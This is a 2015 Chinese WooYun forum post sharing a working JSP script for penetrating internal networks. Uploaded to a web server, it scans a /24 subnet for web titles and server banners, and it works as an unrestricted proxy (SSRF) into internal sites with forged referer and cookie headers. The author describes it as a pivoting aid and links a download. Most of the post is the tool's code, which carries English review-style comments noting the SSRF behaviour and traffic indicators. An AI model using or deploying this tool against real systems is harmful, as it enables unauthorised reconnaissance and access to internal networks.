jsp内网探测脚本&简单代理访问 (WOOYUN)


jeary ((:‮?办么怎,了多越来越法方象抽的我)) jsp内网探测脚本&简单代理访问  (WOOYUN) | 2015-09-09 19:06

直接上图:
jsp内网探测脚本&简单代理访问  (WOOYUN)
jsp内网探测脚本&简单代理访问  (WOOYUN)
jsp内网探测脚本&简单代理访问  (WOOYUN)
jsp内网探测脚本&简单代理访问  (WOOYUN)
..
1.直接访问默认扫描当前IP的C段,获取标题、web容器.

2.可以自定义传入需要扫描的段,传入参数ip即可

3.代理访问参数为url,可简单的访问内网的web,对了,我还加载了网站里的css,做到尽量看上去和直接访问的效果一样

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@ page isThreadSafe="false"%>
<%@page import="java.io.PrintWriter"%>
<%@page import="java.io.OutputStreamWriter"%>
<%@page import="java.util.regex.Matcher"%>
<%@page import="java.io.IOException"%>
<%@page import="java.net.InetAddress"%>
<%@page import="java.util.regex.Pattern"%>
<%@page import="java.net.HttpURLConnection"%>
<%@page import="java.util.concurrent.LinkedBlockingQueue"%>

<%!final static List<String> list = new ArrayList<String>();
  // Servlet-instance state that outlives a single request. `referer`, `cookie` and
  // `decode` are overwritten from request parameters in proxy mode and are then
  // forwarded verbatim on every outbound request made by getHTTPConn; `thread` is
  // the scan worker count, also taken from a request parameter with no upper bound.
  // `list` is not referenced anywhere else in the visible code (getTitle declares a
  // local of the same name that shadows it).
  String referer = "";
  String cookie = "";
  String decode = "utf-8";
  int thread = 100;

  // Builds (but does not yet open) an HTTP GET connection to the caller-supplied URL.
  // Nothing restricts scheme, host or port: whatever string arrives here is fetched
  // from this server's own network position, which is what makes the page an
  // SSRF / open-proxy primitive when `urlString` comes straight from a request
  // parameter. The `referer` and `cookie` instance fields (client-settable, see the
  // scriptlet) are sent on every outbound request, and the fixed User-Agent below is
  // a usable indicator for recognising this traffic on the internal network.
  // Returns null on any failure (e.g. malformed URL); callers pass that null on to
  // getHtmlContext, whose catch-all turns the resulting NPE into the "null" sentinel.
  HttpURLConnection getHTTPConn(String urlString) {
    try {
      java.net.URL url = new java.net.URL(urlString);
      java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url
          .openConnection();
      conn.setRequestMethod("GET");
      conn.addRequestProperty("User-Agent",
          "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)");
      // gzip is requested, but getHtmlContext reads the body as plain text, so a
      // compressed response is never inflated.
      conn.addRequestProperty("Accept-Encoding", "gzip");
      conn.addRequestProperty("referer", referer);
      conn.addRequestProperty("cookie", cookie);
      // Left commented out: redirects are followed (HttpURLConnection default).
      //conn.setInstanceFollowRedirects(false);
      // Connect and read each capped at 3s; a silent host fails within that budget.
      conn.setConnectTimeout(3000);
      conn.setReadTimeout(3000);

      return conn;
    } catch (Exception e) {
      // Swallowed: the caller cannot tell a bad URL apart from any other failure.
      return null;
    }
  }

  // Unused instance field: getHtmlContext and getServerType take `conn` as a
  // parameter, and the scan worker declares a local `conn`, all of which shadow it.
  HttpURLConnection conn;

  // Sends the request (getInputStream is where the connection is actually opened)
  // and returns the response body as text, blank lines dropped and every remaining
  // line followed by "\n".
  // decode: charset name for the body; null falls back to "utf-8".
  // Any failure -- null conn, I/O error, unsupported charset name, or a 4xx/5xx
  // status (getInputStream throws on those) -- is caught, logged to the container's
  // stdout and reported as the literal string "null". Callers compare against that
  // string, so it is the error sentinel; this method never returns a Java null.
  String getHtmlContext(HttpURLConnection conn, String decode) {
    Map<String, Object> result = new HashMap<String, Object>();  // unused
    try {

      String code = "utf-8";
      if (decode != null) {
        code = decode;
      }
      StringBuffer html = new StringBuffer();
      java.io.InputStreamReader isr = new java.io.InputStreamReader(
          conn.getInputStream(), code);
      java.io.BufferedReader br = new java.io.BufferedReader(isr);

      String temp;
      while ((temp = br.readLine()) != null) {
        if (!temp.trim().equals("")) {
          html.append(temp).append("\n");
        }
      }
      // Closed only on the success path; an exception mid-read leaks both readers
      // (no finally / try-with-resources).
      br.close();
      isr.close();
      return html.toString();
    } catch (Exception e) {
      System.out.println("getHtmlContext:"+e.getMessage());
      return "null";
    }
  }

  // Returns the response's Server header (the "web container" banner the post
  // mentions). Yields a Java null when the header is absent and the string "null"
  // when conn is null or getHeaderField throws; both print as "null" in the scan
  // output line.
  String getServerType(HttpURLConnection conn) {
    try {
      return conn.getHeaderField("Server");
    } catch (Exception e) {
      return "null";
    }

  }

  // Extracts every <title>...</title> occurrence, concatenates them and strips tags.
  // The pattern is case-sensitive and single-line (no DOTALL), so an upper-case
  // <TITLE> or a title split across lines is missed and the result is "".
  // Returns null only when something throws, e.g. when htmlSource is null.
  String getTitle(String htmlSource) {
    try {
      // Local list; shadows the unused static field of the same name.
      List<String> list = new ArrayList<String>();
      String title = "";
      Pattern pa = Pattern.compile("<title>.*?</title>");
      Matcher ma = pa.matcher(htmlSource);
      while (ma.find()) {
        list.add(ma.group());
      }
      for (int i = 0; i < list.size(); i++) {
        title = title + list.get(i);
      }
      return title.replaceAll("<.*?>", "");
    } catch (Exception e) {
      return null;
    }
  }

  // Collects stylesheet references from the proxied page and inlines each one as a
  // <style> block so the proxied page renders roughly like a direct visit (the css
  // feature described in the post). Each stylesheet is fetched through getHTTPConn,
  // i.e. with the same forwarded referer/cookie and from the server's network.
  // html   : page source; matched lower-cased, so captured paths are lower-cased too,
  //          which may 404 on case-sensitive servers.
  // url    : the proxied URL; every captured path is appended as url + "/" + path,
  //          so absolute (http://...) or root-relative (/...) hrefs most likely form a
  //          bogus URL and come back as "<style>null</style>", because
  //          getHtmlContext returns its "null" sentinel on failure.
  // decode : charset name passed through to getHtmlContext.
  // Returns the list of "<style>...</style>" strings, empty when nothing matched or
  // on an exception (logged to stdout).
  List<String> getCss(String html, String url, String decode) {
    List<String> cssurl = new ArrayList<String>();
    List<String> csscode = new ArrayList<String>();
    try {

      String title = "";  // unused
      // Greedy on both sides: at most one match per line, and group(1) may run from an
      // href=" across other markup up to the last ".css" on that line.
      Pattern pa = Pattern.compile(".*href=\"(.*)[.]css");
      Matcher ma = pa.matcher(html.toLowerCase());
      while (ma.find()) {
        cssurl.add(ma.group(1) + ".css");
      }

      for (int i = 0; i < cssurl.size(); i++) {
        String cssuuu = url + "/" + cssurl.get(i);
        String csshtml = "<style>"
            + getHtmlContext(getHTTPConn(cssuuu), decode)
            + "</style>";
        csscode.add(csshtml);

      }
    } catch (Exception e) {
      System.out.println("getCss:"+e.getMessage());
    }
    return csscode;

  }

  // Address the scan defaults to when no `ip` parameter is given: this host's own
  // address as resolved from its hostname. NOTE(review): getLocalHost can resolve to
  // loopback on some hosts, in which case the default sweep would cover 127.0.0.x;
  // throws UnknownHostException if the hostname does not resolve at all.
  String getMyIPLocal() throws IOException {
    InetAddress ia = InetAddress.getLocalHost();
    return ia.getHostAddress();
  }%>
<%
  // Request dispatch. Two modes, selected by parameter:
  //   url=...        -> proxy mode: fetch the URL server-side and echo the body back.
  //   anything else  -> scan mode: probe every host of one /24 over HTTP on port 80.
  // The parameters read here (url, ip, thread, decode, referer, cookie) are the
  // request-log artefacts of this page; in scan mode every probed address is
  // additionally printed to the container's stdout below.
  String u = request.getParameter("url");
  String ip = request.getParameter("ip");

  if (u != null) {
    // `decode`, `referer` and `cookie` are instance fields, so values set by one
    // request stay in effect for later ones (isThreadSafe="false" only serialises or
    // pools the page instance, it does not reset state). `decode` may become null
    // here; getHtmlContext treats null as "utf-8".
    decode = request.getParameter("decode");
    String ref = request.getParameter("referer");
    String cook = request.getParameter("cookie");
    if (ref != null) {
      referer = ref;
    }
    if (cook != null) {
      cookie = cook;
    }
    // Unrestricted server-side fetch of a client-supplied URL (SSRF / open proxy).
    String html = getHtmlContext(getHTTPConn(u), decode);
    List<String> css = getCss(html, u, decode);
    String csshtml = "";
    // "null" is getHtmlContext's failure sentinel, never a Java null.
    if (!html.equals("null")) {

      for (int i = 0; i < css.size(); i++) {
        csshtml += css.get(i);
      }
      // The remote body is written into this response unmodified (no rewriting of
      // links, scripts or forms), followed by the inlined stylesheets.
      out.print(html + csshtml);
    } else {
      response.setStatus(HttpServletResponse.SC_NOT_FOUND);
      out.print("请求失败!");
    }

    return;
  }

  else if (ip != null || u == null) {
    // Always true here: the `u != null` branch above has already returned, so this
    // is effectively a plain else.
    String threadpp = (request.getParameter("thread"));
    if (threadpp != null) {
      // No upper bound, and parseInt sits outside the try below: a non-numeric value
      // surfaces as the container's error page, a huge value as that many threads.
      thread = Integer.parseInt(threadpp);
      System.out.println(threadpp);
    }
    try {
      try {
        String http = "http://";
        // Defaults to this host's own address; `ip` overrides it. Only the text up
        // to and including the last '.' is kept, i.e. the first three octets.
        String localIP = getMyIPLocal();
        if (ip != null) {
          localIP = ip;
        }
        String useIP = localIP.substring(0,
            localIP.lastIndexOf(".") + 1);
        final Queue<String> queue = new LinkedBlockingQueue<String>();
        // 1..256 inclusive: .0 is never probed and .256 is not a valid IPv4 last
        // octet, so the final queue entry always fails.
        for (int i = 1; i <= 256; i++) {
          String url = http + useIP + i;
          queue.offer(url);
        }
        final JspWriter pw = out;
        ThreadGroup tg = new ThreadGroup("c");
        // `thread` workers drain the shared queue. They read the `decode` field and
        // write to the same JspWriter concurrently with no synchronisation, so
        // output lines may interleave.
        for (int i = 0; i < thread; i++) {
          new Thread(tg, new Runnable() {
            public void run() {
              while (true) {
                String addr = queue.poll();
                if (addr != null) {
                  // Every probed address goes to stdout: a server-side trace of the
                  // whole sweep.
                  System.out.println(addr);
                  HttpURLConnection conn = getHTTPConn(addr);
                  String html = getHtmlContext(conn,
                      decode);
                  String title = getTitle(html);
                  String serverType = getServerType(conn);
                  String status = !html
                      .equals("null") ? "Success"
                      : "Fail";
                  // html is never a Java null (see getHtmlContext), so only the
                  // status test matters: a host is reported only when it returned a
                  // readable, non-error HTTP response.
                  if (html != null
                      && !status.equals("Fail")) {
                    try {
                      pw.println(addr + "  >>  "+ title + ">>"+ serverType+ " >>" + status+ "<br/>");
                    } catch (Exception e) {
                      e.printStackTrace();
                    }
                  }
                } else {
                  // Queue drained: this worker exits.
                  return;
                }
              }
            }
          }).start();
        }
        // Busy-wait until every worker has exited: spins a CPU core for the entire
        // sweep instead of joining the threads.
        while (tg.activeCount() != 0) {
        }
      } catch (Exception e) {
        e.printStackTrace();
      }
    } catch (Exception e) {
      // Not reachable for anything the inner catch-all already handles; if it were,
      // it would echo the exception text to the client.
      out.println(e.toString());
    }
  }
%>

参数:
ip [需要探测的ip段]

url [需要请求的地址]

其他参数:

thread [指定线程数]

decode [指定编码]

referer  [伪造referer]

cookie [伪造cookie]

待完善:
1.一个C段,可能有多种编码格式,所以指定一个参数是有问题的。

2.端口可以修改传入一个数组,支持探测多个端口80,8080..

3.代理访问功能并不完善,例如加载js、加载图片、超链接替换成代理访问的链接、表单替换支持真实请求..

对了,其实这个主要是用于偷懒或者内网渗透时,各种代理总是遇到问题出不来。坐等大神写个完善版本的。
(我自己来还得慢慢改。)

PS:很久没写代码,代码渣,多线程还是没学会。看来代码就是得天天写才能熟练。

Link:http://pan.baidu.com/s/1qWDsv3e
